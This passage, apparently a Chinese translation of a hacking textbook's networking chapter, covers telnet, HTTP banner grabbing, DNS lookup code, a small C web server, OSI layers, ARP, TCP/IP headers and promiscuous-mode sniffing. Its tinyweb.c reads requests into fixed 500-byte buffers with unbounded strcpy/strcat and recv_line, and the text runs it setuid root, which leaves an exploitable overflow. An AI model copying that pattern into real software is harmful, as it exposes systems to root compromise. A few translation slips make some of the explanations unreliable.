Trying 192.168.42.248...
Connected to 192.168.42.248.
Escape character is '^]'.
Hello, world!
this is a test
fjsghau;ehg;ihskjfhasdkfjhaskjvhfdkjhvbkjgf

连接后，服务器发送字符串Hello, world!，其余的是我输入this is a test的本地字符回显和一行键盘敲击。由于 telnet 是按行缓冲的，所以这两行在按下ENTER键时都会发送回服务器。在服务器端，输出显示了连接和数据包，这些数据包被发送回。

在本地机器上

reader@hacking:~/booksrc $ ./a.out 
server: got connection from 192.168.42.1 port 56971
RECV: 16 bytes
74 68 69 73 20 69 73 20 61 20 74 65 73 74 0d 0a | This is a test...
RECV: 45 bytes
66 6a 73 67 68 61 75 3b 65 68 67 3b 69 68 73 6b | fjsghau;ehg;ihsk
6a 66 68 61 73 64 6b 66 6a 68 61 73 6b 6a 76 68 | jfhasdkfjhaskjvh
66 64 6b 6a 68 76 62 6b 6a 67 66 0d 0a          | fdkjhvbkjgf...

一个 Web 客户端示例

telnet 程序作为我们的服务器客户端工作得很好，所以实际上没有太多理由去编写一个专门的客户端。然而，有成千上万种不同类型的服务器接受标准的 TCP/IP 连接。每次你使用网络浏览器时，它都会连接到某个地方的 web 服务器。这个连接通过 HTTP 在连接上传输网页，HTTP 定义了请求和发送信息的一种特定方式。默认情况下，web 服务器运行在端口 80 上，这个端口在/etc/services 中列出了许多其他默认端口。

来自/etc/services

finger    79/tcp        # Finger
finger    79/udp
http      80/tcp    www www-http  # World Wide Web HTTP

HTTP 存在于 OSI 模型的网络层——最顶层。在这一层，所有网络细节都已经被下层处理完毕，因此 HTTP 使用明文作为其结构。许多其他应用层协议也使用明文，例如 POP3、SMTP、IMAP 以及 FTP 的控制通道。由于这些是标准协议，它们都有很好的文档记录，并且易于研究。一旦你了解了这些各种协议的语法，你就可以手动与其他使用相同语言的程序进行交流。不需要流利，但了解一些重要短语将有助于你在访问国外服务器时。在 HTTP 的语言中，使用命令GET发起请求，后跟资源路径和 HTTP 协议版本。例如，GET / HTTP/1.0将使用 HTTP 1.0 版本从 web 服务器请求根文档。实际上，请求的是/的根目录，但大多数 web 服务器会自动在该目录中搜索默认的 HTML 文档 index.html。如果服务器找到资源，它将通过发送几个头部信息来使用 HTTP 响应，然后再发送内容。如果使用的是命令HEAD而不是GET，它将只返回 HTTP 头部信息而不包含内容。这些头部信息是明文的，通常可以提供关于服务器的信息。这些头部信息可以通过 telnet 手动获取，通过连接到已知网站的 80 端口，然后输入HEAD / HTTP/1.0并按两次 ENTER。在下面的输出中，telnet 用于打开到www.internic.net的 web 服务器的 TCP-IP 连接。然后手动与 HTTP 应用层进行交流，请求主索引页的头部信息。

reader@hacking:~/booksrc $ telnet www.internic.net 80
Trying 208.77.188.101...
Connected to www.internic.net.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 14 Sep 2007 05:34:14 GMT
Server: Apache/2.0.52 (CentOS)
Accept-Ranges: bytes
Content-Length: 6743
Connection: close
Content-Type: text/html; charset=UTF-8

Connection closed by foreign host.
reader@hacking:~/booksrc $

这揭示了 web 服务器是 Apache 版本 2.0.52，甚至可以知道主机运行的是 CentOS。这对于配置文件分析可能很有用，所以让我们编写一个程序来自动化这个手动过程。

接下来的几个程序将发送和接收大量数据。由于标准套接字函数不是很友好，让我们编写一些发送和接收数据的函数。这些函数被称为 send_string() 和 recv_line()，并将添加到一个名为 hacking-network.h 的新头文件中。

正常的 send() 函数返回写入的字节数，这并不总是等于你尝试发送的字节数。send_string() 函数接受一个套接字和一个字符串指针作为参数，并确保整个字符串通过套接字发送出去。它使用 strlen() 来确定传递给它的字符串的总长度。

你可能已经注意到，简单服务器接收到的每个数据包都以字节 0x0D 和 0x0A 结尾。这就是 telnet 终止行的方式——它发送一个回车符和一个换行符。HTTP 协议也期望行以这两个字节结束。快速查看 ASCII 表可以看出，0x0D 是回车符 ('\r')，而 0x0A 是换行符 ('\n')。

reader@hacking:~/booksrc $ man ascii | egrep "Hex|0A|0D"
Reformatting ascii(7), please wait...
       Oct   Dec   Hex   Char                        Oct   Dec   Hex   Char
       012   10    0A    LF  '\n' (new line)         112   74    4A    J
       015   13    0D    CR  '\r' (carriage ret)     115   77    4D    M
reader@hacking:~/booksrc $

recv_line() 函数读取整个数据行。它从作为第一个参数传递的套接字读取数据到第二个参数指向的缓冲区。它继续从套接字接收数据，直到遇到连续的最后一个两个行终止字节。然后它终止字符串并退出函数。这些新函数确保所有字节都发送和接收以 '\r\n' 结尾的数据行。它们列在下面，在一个名为 hacking-network.h 的新头文件中。

hacking-network.h

/* This function accepts a socket FD and a ptr to the null terminated
 * string to send.  The function will make sure all the bytes of the
 * string are sent.  Returns 1 on success and 0 on failure.
 */
int send_string(int sockfd, unsigned char *buffer) {
   int sent_bytes, bytes_to_send;
   bytes_to_send = strlen(buffer);
   while(bytes_to_send > 0) {
      sent_bytes = send(sockfd, buffer, bytes_to_send, 0);
      if(sent_bytes == -1)
         return 0; // Return 0 on send error.
      bytes_to_send -= sent_bytes;
      buffer += sent_bytes;
   }
   return 1; // Return 1 on success.
}

/* This function accepts a socket FD and a ptr to a destination
 * buffer.  It will receive from the socket until the EOL byte
 * sequence in seen.  The EOL bytes are read from the socket, but
 * the destination buffer is terminated before these bytes.
 * Returns the size of the read line (without EOL bytes).
 */
int recv_line(int sockfd, unsigned char *dest_buffer) {
#define EOL "\r\n" // End-of-line byte sequence
#define EOL_SIZE 2
   unsigned char *ptr;
   int eol_matched = 0;

   ptr = dest_buffer;
   while(recv(sockfd, ptr, 1, 0) == 1) { // Read a single byte.
      if(*ptr == EOL[eol_matched]) { // Does this byte match terminator?
         eol_matched++;
         if(eol_matched == EOL_SIZE) { // If all bytes match terminator,
            *(ptr+1-EOL_SIZE) = '\0'; // terminate the string.
            return strlen(dest_buffer); // Return bytes received
         }
      } else {
         eol_matched = 0;
      }
      ptr++; // Increment the pointer to the next byter.
   }
   return 0; // Didn't find the end-of-line characters.
}

将套接字连接到数值 IP 地址相当简单，但命名地址通常用于方便。在手册 HTTP HEAD 请求中，telnet 程序自动执行 DNS（域名服务）查找以确定 www.internic.net 对应于 IP 地址 192.0.34.161。DNS 是一种协议，允许通过命名地址查找 IP 地址，类似于如果你知道名字，可以在电话簿中查找电话号码。自然，有一些与套接字相关的函数和结构专门用于通过 DNS 进行主机名查找。这些函数和结构在 netdb.h 中定义。一个名为 gethostbyname() 的函数接受一个包含命名地址的字符串指针，并在成功时返回一个指向 hostent 结构的指针，或者在出错时返回 NULL 指针。hostent 结构包含查找信息，包括作为网络字节顺序的 32 位整数的数值 IP 地址。类似于 inet_ntoa() 函数，这个结构的内存是在函数中静态分配的。这个结构如下所示，列在 netdb.h 中。

来自 /usr/include/netdb.h

/* Description of database entry for a single host.  */
struct hostent
{
  char *h_name;     /* Official name of host.  */
  char **h_aliases;   /* Alias list.  */
  int h_addrtype;   /* Host address type.  */
  int h_length;     /* Length of address.  */
  char **h_addr_list;   /* List of addresses from name server.  */
#define h_addr  h_addr_list[0]  /* Address, for backward compatibility.  */
};

以下代码演示了 gethostbyname() 函数的使用。

host_lookup.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#include <netdb.h>

#include "hacking.h"

int main(int argc, char *argv[]) {
   struct hostent *host_info;
   struct in_addr *address;

   if(argc < 2) {
      printf("Usage: %s <hostname>\n", argv[0]);
      exit(1);
   }

   host_info = gethostbyname(argv[1]);
   if(host_info == NULL) {
      printf("Couldn't lookup %s\n", argv[1]);
   } else {
      address = (struct in_addr *) (host_info->h_addr);
      printf("%s has address %s\n", argv[1], inet_ntoa(*address));
   }
}

此程序接受一个主机名作为其唯一参数，并打印出 IP 地址。gethostbyname()函数返回一个指向hostent结构的指针，该结构包含在元素h_addr中的 IP 地址。将此元素的指针转换为in_addr指针，稍后用于调用inet_ntoa()，该函数期望一个in_addr结构作为其参数。以下页面展示了示例程序输出。

reader@hacking:~/booksrc $ gcc -o host_lookup host_lookup.c 
reader@hacking:~/booksrc $ ./host_lookup www.internic.net
www.internic.net has address 208.77.188.101
reader@hacking:~/booksrc $ ./host_lookup www.google.com
www.google.com has address 74.125.19.103 
reader@hacking:~/booksrc $

使用套接字函数构建在此之上，创建一个网络服务器识别程序并不困难。

webserver_id.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#include "hacking.h"
#include "hacking-network.h"

int main(int argc, char *argv[]) {
   int sockfd;
   struct hostent *host_info;
   struct sockaddr_in target_addr;
   unsigned char buffer[4096];

   if(argc < 2) {
      printf("Usage: %s <hostname>\n", argv[0]);
      exit(1);
   }

   if((host_info = gethostbyname(argv[1])) == NULL)
      fatal("looking up hostname");

   if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
      fatal("in socket");

   target_addr.sin_family = AF_INET;
   target_addr.sin_port = htons(80);
   target_addr.sin_addr = *((struct in_addr *)host_info->h_addr);
   memset(&(target_addr.sin_zero), '\0', 8); // Zero the rest of the struct.

   if (connect(sockfd, (struct sockaddr *)&target_addr, sizeof(struct sockaddr)) == -1)
      fatal("connecting to target server");

   send_string(sockfd, "HEAD / HTTP/1.0\r\n\r\n");
   while(recv_line(sockfd, buffer)) {
      if(strncasecmp(buffer, "Server:", 7) == 0) {
         printf("The web server for %s is %s\n", argv[1], buffer+8);
         exit(0);
      }
   }
   printf("Server line not found\n");
   exit(1);
}

现在大部分代码应该对你来说都是有意义的。target_addr结构的sin_addr元素使用之前的方法通过类型转换和间接引用填充了host_info结构中的地址。调用connect()函数连接到目标主机的 80 端口，发送命令字符串，程序循环读取每一行到缓冲区。strncasecmp()函数是 strings.h 中的字符串比较函数。此函数比较两个字符串的前n个字节，忽略大小写。前两个参数是字符串的指针，第三个参数是n，要比较的字节数。如果字符串匹配，函数将返回0，因此if语句正在寻找以"Server:"开头的行。当找到它时，它将删除前八个字节并打印出网络服务器的版本信息。以下列表显示了程序的编译和执行。

reader@hacking:~/booksrc $ gcc -o webserver_id webserver_id.c
reader@hacking:~/booksrc $ ./webserver_id www.internic.net
The web server for www.internic.net is Apache/2.0.52 (CentOS)
reader@hacking:~/booksrc $ ./webserver_id www.microsoft.com
The web server for www.microsoft.com is Microsoft-IIS/7.0
reader@hacking:~/booksrc $

一个 Tinyweb 服务器

网络服务器不必比我们在上一节中创建的简单服务器复杂得多。在接收 TCP-IP 连接后，网络服务器需要使用 HTTP 协议实现进一步的通信层。

下面列出的服务器代码几乎与简单服务器相同，除了连接处理代码被分离到自己的函数中。此函数处理来自网络浏览器的 HTTP GET和HEAD请求。程序将在名为 webroot 的本地目录中查找请求的资源并将其发送到浏览器。如果找不到文件，服务器将返回 404 HTTP 响应。你可能已经熟悉这个响应，这意味着文件未找到。完整的源代码列表如下。

tinyweb.c

#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "hacking.h"
#include "hacking-network.h"

#define PORT 80   // The port users will be connecting to
#define WEBROOT "./webroot" // The web server's root directory

void handle_connection(int, struct sockaddr_in *); // Handle web requests
int get_file_size(int); // Returns the filesize of open file descriptor

int main(void) {
   int sockfd, new_sockfd, yes=1;
   struct sockaddr_in host_addr, client_addr;   // My address information
   socklen_t sin_size;

   printf("Accepting web requests on port %d\n", PORT);

   if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
      fatal("in socket");

   if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
      fatal("setting socket option SO_REUSEADDR");

   host_addr.sin_family = AF_INET;      // Host byte order
   host_addr.sin_port = htons(PORT);    // Short, network byte order
   host_addr.sin_addr.s_addr = INADDR_ANY; // Automatically fill with my IP.
   memset(&(host_addr.sin_zero), '\0', 8); // Zero the rest of the struct.

   if (bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr)) == -1)
      fatal("binding to socket");

   if (listen(sockfd, 20) == -1)
      fatal("listening on socket");

   while(1) {   // Accept loop.
      sin_size = sizeof(struct sockaddr_in);
      new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
      if(new_sockfd == -1)
         fatal("accepting connection");

      handle_connection(new_sockfd, &client_addr);
   }
   return 0;
}

/* This function handles the connection on the passed socket from the
 * passed client address.  The connection is processed as a web request,
 * and this function replies over the connected socket.  Finally, the
 * passed socket is closed at the end of the function.
 */
void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr) {
   unsigned char *ptr, request[500], resource[500];
   int fd, length;

   length = recv_line(sockfd, request);

   printf("Got request from %s:%d \"%s\"\n", inet_ntoa(client_addr_ptr->sin_addr),
ntohs(client_addr_ptr->sin_port), request);

   ptr = strstr(request, " HTTP/"); // Search for valid-looking request.
   if(ptr == NULL) { // Then this isn't valid HTTP.
      printf(" NOT HTTP!\n");
   } else {
      *ptr = 0; // Terminate the buffer at the end of the URL.
      ptr = NULL; // Set ptr to NULL (used to flag for an invalid request).
      if(strncmp(request, "GET ", 4) == 0)  // GET request
         ptr = request+4; // ptr is the URL.
      if(strncmp(request, "HEAD ", 5) == 0) // HEAD request
         ptr = request+5; // ptr is the URL.

      if(ptr == NULL) { // Then this is not a recognized request.
         printf("\tUNKNOWN REQUEST!\n");
      } else { // Valid request, with ptr pointing to the resource name
         if (ptr[strlen(ptr) - 1] == '/')  // For resources ending with '/',
            strcat(ptr, "index.html");     // add 'index.html' to the end.
         strcpy(resource, WEBROOT);     // Begin resource with web root path
         strcat(resource, ptr);         //  and join it with resource path.
         fd = open(resource, O_RDONLY, 0); // Try to open the file.
         printf("\tOpening \'%s\'\t", resource);
         if(fd == -1) { // If file is not found
            printf(" 404 Not Found\n");
            send_string(sockfd, "HTTP/1.0 404 NOT FOUND\r\n");
            send_string(sockfd, "Server: Tiny webserver\r\n\r\n");
            send_string(sockfd, "<html><head><title>404 Not Found</title></head>");
            send_string(sockfd, "<body><h1>URL not found</h1></body></html>\r\n");
         } else {      // Otherwise, serve up the file.
            printf(" 200 OK\n");
            send_string(sockfd, "HTTP/1.0 200 OK\r\n");
            send_string(sockfd, "Server: Tiny webserver\r\n\r\n");
            if(ptr == request + 4) { // Then this is a GET request
               if( (length = get_file_size(fd)) == -1)
                  fatal("getting resource file size");
               if( (ptr = (unsigned char *) malloc(length)) == NULL)
                  fatal("allocating memory for reading resource");
               read(fd, ptr, length); // Read the file into memory.
               send(sockfd, ptr, length, 0);  // Send it to socket.
               free(ptr); // Free file memory.
            }
            close(fd); // Close the file.
         } // End if block for file found/not found.
      } // End if block for valid request.
   } // End if block for valid HTTP.
   shutdown(sockfd, SHUT_RDWR); // Close the socket gracefully.
}

/* This function accepts an open file descriptor and returns
 * the size of the associated file.  Returns -1 on failure.
 */
int get_file_size(int fd) {
   struct stat stat_struct;

   if(fstat(fd, &stat_struct) == -1)
      return -1;
   return (int) stat_struct.st_size;
}

handle_connection函数使用strstr()函数在请求缓冲区中查找子字符串HTTP/。strstr()函数返回指向子字符串的指针，该指针将位于请求的末尾。字符串在这里被终止，HEAD和GET请求被识别为可处理请求。HEAD请求将仅返回头部信息，而GET请求将返回请求的资源（如果可以找到）。

文件 index.html 和 image.jpg 已经被放入 webroot 目录中，如下面的输出所示，然后编译了 tinyweb 程序。绑定任何小于 1024 的端口需要 root 权限，因此程序被设置为 root 用户执行。服务器的调试输出显示了浏览器对 http://127.0.0.1 的请求结果。

reader@hacking:~/booksrc $ ls -l webroot/
total 52
-rwxr--r-- 1 reader reader 46794 2007-05-28 23:43 image.jpg
-rw-r--r-- 1 reader reader   261 2007-05-28 23:42 index.html
reader@hacking:~/booksrc $ cat webroot/index.html 
<html>
<head><title>A sample webpage</title></head>
<body bgcolor="#000000" text="#ffffffff">
<center>
<h1>This is a sample webpage</h1>
...and here is some sample text<br>
<br>
..and even a sample image:<br>
<img src="image.jpg"><br>
</center>
</body>
</html>
reader@hacking:~/booksrc $ gcc -o tinyweb tinyweb.c
reader@hacking:~/booksrc $ sudo chown root ./tinyweb
reader@hacking:~/booksrc $ sudo chmod u+s ./tinyweb
reader@hacking:~/booksrc $ ./tinyweb
Accepting web requests on port 80
Got request from 127.0.0.1:52996 "GET / HTTP/1.1"
        Opening './webroot/index.html'   200 OK
Got request from 127.0.0.1:52997 "GET /image.jpg HTTP/1.1"
        Opening './webroot/image.jpg'    200 OK
Got request from 127.0.0.1:52998 "GET /favicon.ico HTTP/1.1"
        Opening './webroot/favicon.ico' 404 Not Found

地址 127.0.0.1 是一个特殊的回环地址，它指向本地机器。初始请求从 web 服务器获取 index.html，然后 web 服务器又请求 image.jpg。此外，浏览器还会自动请求 favicon.ico，试图获取网页的图标。下面的截图显示了浏览器中这个请求的结果。

图 0x400-3。

撕开底层

当你使用网页浏览器时，所有七层 OSI 模型都会为你处理，让你可以专注于浏览而不是协议。在 OSI 模型的较高层，许多协议可以是明文，因为所有其他连接的细节已经被较低层处理好了。套接字存在于会话层（5），它提供了一个接口，用于从一个主机向另一个主机发送数据。传输层的 TCP（4）提供可靠性和传输控制，而网络层的 IP（3）提供寻址和包级通信。数据链路层的以太网（2）提供以太网端口之间的寻址，适用于基本的局域网（Local Area Network）通信。在最底层，物理层（1）仅仅是电线和用于将比特从一台设备发送到另一台设备的协议。一个单独的 HTTP 消息会在通过通信的不同方面时被包裹在多个层中。

这个过程可以想象成一个复杂的内部办公室官僚机构，让人联想到电影巴西。在每一层，都有一个高度专业化的接待员，他们只理解该层的语言和协议。当数据包传输时，每个接待员都会执行她特定层的必要职责，将数据包放入一个内部办公室的信封中，在外部写上标题，并将其传递给下一层的接待员。那个接待员接着执行他层的必要职责，将整个信封放入另一个信封中，在外部写上标题，然后传递出去。网络流量是服务器、客户端和对等连接的嘈杂官僚机构。在较高层，流量可能是财务数据、电子邮件或基本上任何东西。无论数据包包含什么，用于将数据从 A 点移动到 B 点的较低层使用的协议通常都是相同的。一旦你理解了这些常见底层协议的办公室官僚机构，你就可以查看传输中的信封，甚至伪造文件来操纵系统。

数据链路层

最低的可视层是数据链路层。回到接待员和官僚主义的类比，如果将下面的物理层视为办公室邮件车，将上面的网络层视为全球邮政系统，那么数据链路层就是办公室邮件系统。这一层提供了一种向办公室内的任何人发送消息并确定谁在办公室的方法。

以太网存在于这一层，为所有以太网设备提供标准地址系统。这些地址被称为媒体访问控制（MAC）地址。每个以太网设备都被分配一个全球唯一的地址，由六个字节组成，通常以十六进制形式书写，形式为xx:xx:xx:xx:xx:xx。这些地址有时也被称为硬件地址，因为每个地址都是独一无二的，存储在设备的集成电路内存中。可以将 MAC 地址视为硬件的社保号码，因为每块硬件都应该有一个唯一的 MAC 地址。

以太网头部大小为 14 字节，包含此以太网数据包的源 MAC 地址和目的 MAC 地址。以太网地址还提供了一个特殊的广播地址，由所有二进制 1 组成（ff:ff:ff:ff:ff:ff）。任何发送到该地址的以太网数据包都将发送到所有连接的设备。

网络设备的 MAC 地址不应该改变，但它的 IP 地址可能会定期改变。在这一层，IP 地址的概念不存在，只有硬件地址，因此需要一种方法来关联这两种地址方案。在办公室里，寄给办公室地址的员工邮件会送到相应的办公桌。在以太网中，这种方法被称为地址解析协议（ARP）。

此协议允许创建“座位图”，将一个 IP 地址与一块硬件关联起来。ARP 消息有四种不同类型，但最重要的两种类型是ARP 请求消息和ARP 回复消息。任何数据包的以太网头部都包含一个类型值，用于描述该数据包。此类型用于指定数据包是 ARP 类型消息还是 IP 数据包。

ARP 请求是一条发送到广播地址的消息，其中包含发送者的 IP 地址和 MAC 地址，基本上是这么说的：“嘿，谁有这个 IP？如果是你，请回复并告诉我你的 MAC 地址。”ARP 回复是对请求者的 MAC 地址（以及 IP 地址）的相应回复，表示：“这是我的 MAC 地址，我拥有这个 IP 地址。”大多数实现都会暂时缓存 ARP 回复中接收到的 MAC/IP 地址对，这样就不需要为每个数据包都进行 ARP 请求和回复。这些缓存就像办公室的座位图。

例如，如果一个系统具有 IP 地址 10.10.10.20 和 MAC 地址00:00:00:aa:aa:aa，而同一网络上的另一个系统具有 IP 地址 10.10.10.50 和 MAC 地址00:00:00:bb:bb:bb，那么这两个系统在知道彼此的 MAC 地址之前无法相互通信。

图 0x400-4.

如果第一个系统想要通过 IP 连接到第二个设备的 IP 地址 10.10.10.50，第一个系统将首先检查其 ARP 缓存以查看是否存在针对 10.10.10.50 的条目。由于这是这两个系统第一次尝试通信，将不会有这样的条目，并将向广播地址发送一个 ARP 请求，内容为：“如果你是 10.10.10.50，请通过00:00:00:aa:aa:aa响应我。”由于此请求使用广播地址，网络上的每个系统都能看到请求，但只有具有相应 IP 地址的系统需要响应。在这种情况下，第二个系统会向00:00:00:aa:aa:aa发送一个 ARP 回复，内容为：“我是 10.10.10.50，我在00:00:00:bb:bb:bb。”第一个系统接收到这个回复，将其 ARP 缓存中的 IP 和 MAC 地址对缓存起来，并使用硬件地址进行通信。

网络层

网络层就像一个全球邮政服务，提供了一种用于发送物品到任何地方的寻址和交付方法。在这个层上用于互联网寻址和交付的协议，恰当地被称为互联网协议（IP）；互联网的大多数部分使用 IP 版本 4。

互联网上的每个系统都有一个 IP 地址，由熟悉的四字节排列形式xx.xx.xx.xx组成。在这个层上数据包的 IP 头部大小为 20 字节，由 RFC 791 中定义的各种字段和位标志组成。

来自 RFC 791

[Page 10]
September 1981
                                                       Internet Protocol
                           3\.  SPECIFICATION

3.1\.  Internet Header Format

  A summary of the contents of the internet header follows:

    0                   1                   2                   3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |Version|  IHL  |Type of Service|          Total Length         |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |         Identification        |Flags|      Fragment Offset    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |  Time to Live |    Protocol   |         Header Checksum       |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                       Source Address                          |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Destination Address                        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Options                    |    Padding    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

                    Example Internet Datagram Header

                               Figure 4.
Note that each tick mark represents one bit position.

这张令人惊讶的描述性 ASCII 图显示了这些字段及其在头部中的位置。标准协议有出色的文档。类似于以太网头部，IP 头部也有一个协议字段来描述数据包中的数据类型以及用于路由的源地址和目标地址。此外，头部还携带一个校验和，以帮助检测传输错误，以及处理数据包分片的字段。

互联网协议主要用于传输被更高层包裹的数据包。然而，在这个层上还存在互联网控制消息协议（ICMP）数据包。ICMP 数据包用于消息和诊断。IP 不如邮局可靠——无法保证 IP 数据包实际上会到达其最终目的地。如果出现问题，将发送一个 ICMP 数据包回通知发送者问题。

ICMP 也常用于测试连通性。ping 工具使用 ICMP 回显请求和回显回复消息。如果一个主机想要测试它是否能够路由流量到另一个主机，它会通过发送一个 ICMP 回显请求来 ping 远程主机。当收到 ICMP 回显请求后，远程主机会发送一个 ICMP 回显回复。这些消息可以用来确定两个主机之间的连接延迟。然而，重要的是要记住，ICMP 和 IP 都是无连接的；这个协议层真正关心的是将数据包发送到其目标地址。

有时网络链路会对数据包大小有限制，不允许传输大数据包。IP 可以通过碎片化数据包来处理这种情况，如图所示。

图 0x400-5。

数据包被分割成更小的数据包片段，这些片段可以通过网络链路传输，每个片段都会加上 IP 头部，然后发送出去。每个片段都有一个不同的片段偏移值，这个值存储在头部中。当目的地收到这些片段时，会使用偏移值来重新组装原始的 IP 数据包。

如碎片化之类的规定有助于 IP 数据包的交付，但这并不能维持连接或确保交付。这是传输层协议的工作。

传输层

可以将传输层想象为办公室接待员的第一线，从网络层接收邮件。如果客户想要退回一件有缺陷的商品，他们会发送一条请求退货材料授权（RMA）号码的消息。然后接待员会遵循退货协议，要求收据，并最终发放一个 RMA 号码，以便客户可以邮寄产品。邮局只关心来回发送这些消息（和包裹），而不关心它们的内容。

在这一层有两个主要的协议：传输控制协议（TCP）和用户数据报协议（UDP）。TCP 是互联网上最常用的协议，用于各种服务：telnet、HTTP（网页流量）、SMTP（电子邮件流量）和 FTP（文件传输）都使用 TCP。TCP 流行的一个原因是它提供了透明、可靠且双向的连接，连接两个 IP 地址。流套接字使用 TCP/IP 连接。TCP 的双向连接类似于使用电话——拨号后，通过一个连接双方可以通信。可靠性简单来说就是 TCP 会确保所有数据都能按正确的顺序到达目的地。如果连接中的数据包顺序混乱并到达顺序错误，TCP 会确保在将数据交给下一层之前将它们重新排序。如果在连接中间丢失了一些数据包，目的地会保留它已经收到的数据包，而源端会重新传输丢失的数据包。

所有这些功能都是通过一组标志实现的，这些标志被称为TCP 标志，以及通过跟踪值称为序列号。TCP 标志如下：

TCP 标志	含义	目的
URG	紧急	标识重要数据
ACK	确认	确认一个数据包；在大多数连接中都是开启的
PSH	推送	告诉接收方直接推送数据而不是缓冲它
RST	重置	重置一个连接
SYN	同步	在连接开始时同步序列号
FIN	结束	当双方都告别时，优雅地关闭连接

这些标志存储在 TCP 头部，与源端口和目标端口一起。TCP 头部在 RFC 793 中指定。

来自 RFC 793

[Page 14]

September 1981
                                           Transmission Control Protocol

                      3\.  FUNCTIONAL SPECIFICATION

3.1\.  Header Format

  TCP segments are sent as internet datagrams.  The Internet Protocol
  header carries several information fields, including the source and
  destination host addresses [2].  A TCP header follows the internet
  header, supplying information specific to the TCP protocol.  This
  division allows for the existence of host level protocols other than
  TCP.

  TCP Header Format

    0                   1                   2                   3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |          Source Port          |       Destination Port        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                        Sequence Number                        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Acknowledgment Number                      |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |  Data |           |U|A|P|R|S|F|                               |
   | Offset| Reserved  |R|C|S|S|Y|I|            Window             |
   |       |           |G|K|H|T|N|N|                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |           Checksum            |         Urgent Pointer        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Options                    |    Padding    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                             data                              |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

                            TCP Header Format

          Note that one tick mark represents one bit position.

                               Figure 3.

序列号和确认号用于维护状态。SYN 和 ACK 标志一起用于在三个步骤的握手过程中打开连接。当客户端想要与服务器建立连接时，会发送一个带有 SYN 标志但 ACK 标志关闭的数据包到服务器。然后服务器响应一个同时带有 SYN 和 ACK 标志的数据包。为了完成连接，客户端发送一个带有 SYN 标志关闭但 ACK 标志开启的数据包。之后，连接中的每个数据包都将开启 ACK 标志并关闭 SYN 标志。只有连接的前两个数据包带有 SYN 标志，因为那些数据包用于同步序列号。

图 0x400-6.

序列号允许 TCP 将无序的数据包重新排序，确定数据包是否缺失，并防止混淆来自其他连接的数据包。

当一个连接被发起时，每一方都会生成一个初始序列号。这个数字在连接握手的前两个 SYN 数据包中传达给对方。然后，随着每个数据包的发送，序列号会根据数据包数据部分的字节数增加。这个序列号包含在 TCP 数据包头部中。此外，每个 TCP 头部都有一个确认号，它简单地是另一方的序列号加一。

TCP 非常适合需要可靠性和双向通信的应用程序。然而，这种功能的代价是通信开销。

UDP 比 TCP 有更少的开销和内置功能。这种缺乏功能使得它表现得非常像 IP 协议：它是无连接和不可靠的。没有内置的功能来创建连接并保持可靠性，UDP 是一种期望应用程序处理这些问题的替代方案。有时不需要连接，轻量级的 UDP 对于这些情况来说是一个更好的协议。UDP 头，在 RFC 768 中定义，相对较小。它只包含以下顺序的四个 16 位值：源端口、目的端口、长度和校验和。

网络嗅探

在数据链路层，存在交换网络和非交换网络之间的区别。在非交换网络上，以太网数据包通过网络上的每个设备，期望每个系统设备只查看发送到其目的地址的数据包。然而，将设备设置为混杂模式相对简单，这会导致它查看所有数据包，无论目的地址如何。大多数数据包捕获程序，如 tcpdump，默认将它们监听的设备置于混杂模式。混杂模式可以使用ifconfig设置，如下面的输出所示。

reader@hacking:~/booksrc $ ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 00:0C:29:34:61:65
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
